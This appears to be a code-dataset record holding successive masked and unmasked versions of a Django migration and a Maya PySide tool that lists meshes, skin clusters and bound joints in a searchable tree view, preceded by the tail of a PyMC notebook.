in_ball])\r\nm.use_step_method(mc.AdaptiveMetropolis, X)\r\n\r\n# <codecell>\r\n\r\nm.sample(100, progress_bar=False)\r\n\r\nplot_trace(X, 3, pl.pi/4)\r\npl.savefig('book/graphics/am-ball-1.pdf')\r\n\r\n# <codecell>\r\n\r\nm.sample(iter=20100, burn=20000, progress_bar=False)\r\n\r\nplot_trace(X, 3, pl.pi/4)\r\npl.savefig('book/graphics/am-ball-2.pdf')\r\n\r\npl.show()\r\n\r\n\r\n",
"step-ids": [
3,
6,
7,
8,
11
]
}
|
[
3,
6,
7,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('productores', '0002_auto_20170327_0841')]
    operations = [migrations.AddField(model_name='productor', name='edad',
        field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')],
        default=1, editable=False), preserve_default=False)]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('productores', '0002_auto_20170327_0841')]
    operations = [migrations.AddField(model_name='productor', name='edad',
        field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')],
        default=1, editable=False), preserve_default=False)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-03 14:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('productores', '0002_auto_20170327_0841'),
]
operations = [
migrations.AddField(
model_name='productor',
name='edad',
field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')], default=1, editable=False),
preserve_default=False,
),
]
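For context, the model-side declaration this migration corresponds to would look roughly as follows. This is a sketch meant to be read inside a configured Django app, not run standalone; the real Productor model lives in productores/models.py, which is not part of this document. Note that preserve_default=False means default=1 is only a one-off backfill value for existing rows, so the model field itself carries no default:

from django.db import models


class Productor(models.Model):
    # Matches the field added by the migration above; other fields omitted.
    EDAD_CHOICES = ((1, 'Menor 35'), (2, 'Mayor 35'))
    edad = models.IntegerField(choices=EDAD_CHOICES, editable=False)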
|
flexible
|
{
"blob_id": "2f7be68f08716d5d04d064d81eecb53eb9b80174",
"index": 7635,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('productores', '0002_auto_20170327_0841')]\n operations = [migrations.AddField(model_name='productor', name='edad',\n field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')\n ], default=1, editable=False), preserve_default=False)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('productores', '0002_auto_20170327_0841')]\n operations = [migrations.AddField(model_name='productor', name='edad',\n field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')\n ], default=1, editable=False), preserve_default=False)]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.6 on 2017-04-03 14:45\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('productores', '0002_auto_20170327_0841'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='productor',\n name='edad',\n field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')], default=1, editable=False),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
        def addText(message, alignment=QtCore.Qt.AlignCenter, height=30,
                bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
            text.setAlignment(alignment)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
            self.vlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
            self.hlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
        self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
<|reserved_special_token_0|>
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
__dialog = None
@classmethod
def show_dialog(cls):
if cls.__dialog is None:
cls.__dialog = cls()
else:
cls.__dialog.raise_()
cls.__dialog.show()
def __init__(self, parent=None):
super(MultiSkin_UI, self).__init__(parent=parent)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.setObjectName('multi skin ui')
self.starting_height = 500
self.starting_width = 390
self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))
self.setWindowFlags(QtCore.Qt.Tool)
self.setMinimumWidth(self.starting_width)
self.resize(self.starting_width, self.starting_height)
self.mainBox = QtWidgets.QVBoxLayout()
self.mainBox.setContentsMargins(0, 0, 0, 0)
self.scroll_layout = QtWidgets.QScrollArea()
self.mainBox.addWidget(self.scroll_layout)
self.setLayout(self.mainBox)
self.scroll_layout.setContentsMargins(0, 0, 0, 0)
self.scroll_layout.setWidgetResizable(True)
self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)
self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)
self.scroll_widget = QtWidgets.QWidget()
self.scroll_layout.setWidget(self.scroll_widget)
self.main_layout = QtWidgets.QVBoxLayout()
self.main_layout.setContentsMargins(*([5] * 4))
self.main_layout.setSpacing(2)
self.setLayout(self.main_layout)
self.scroll_widget.setLayout(self.main_layout)
self.widgetsAndLayouts()
self.create_Button()
self.buildMainLayout()
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
def populateQTree(self, filterList):
self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(
item)]) for item in filterList]
[root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]
[root.setExpanded(True) for root in self.roots]
self.QtShapes = []
shape_dic = self.getAllShapes(self.getAllMeshes())
QTroots_dic = {}
for root in self.roots:
try:
QTroots_dic.update({root: shape_dic[root.text(0)]})
except KeyError:
pass
for QTroot, shapesList in QTroots_dic.items():
[QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in
shapesList]
child_count = QTroot.childCount()
children = [QTroot.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in
children]
[child.setExpanded(True) for child in children]
[self.QtShapes.append(child) for child in children]
self.QTClusters = []
cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))
QTshape_dic = {}
for shape in self.QtShapes:
QTshape_dic.update({shape: cluster_dic[shape.text(0)]})
for QTshape, clusterList in QTshape_dic.items():
if clusterList == 'None':
pass
else:
QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])
child_count = QTshape.childCount()
children = [QTshape.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in
children]
[self.QTClusters.append(child) for child in children]
bindJoints_dic = self.getBindJointsFromCluster([x for x in
cluster_dic.values() if x != 'None'])
QTcluster_dic = {}
for cluster in self.QTClusters:
QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})
for QTCluster, jointList in QTcluster_dic.items():
[QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in
jointList]
child_count = QTCluster.childCount()
children = [QTCluster.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in
children]
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
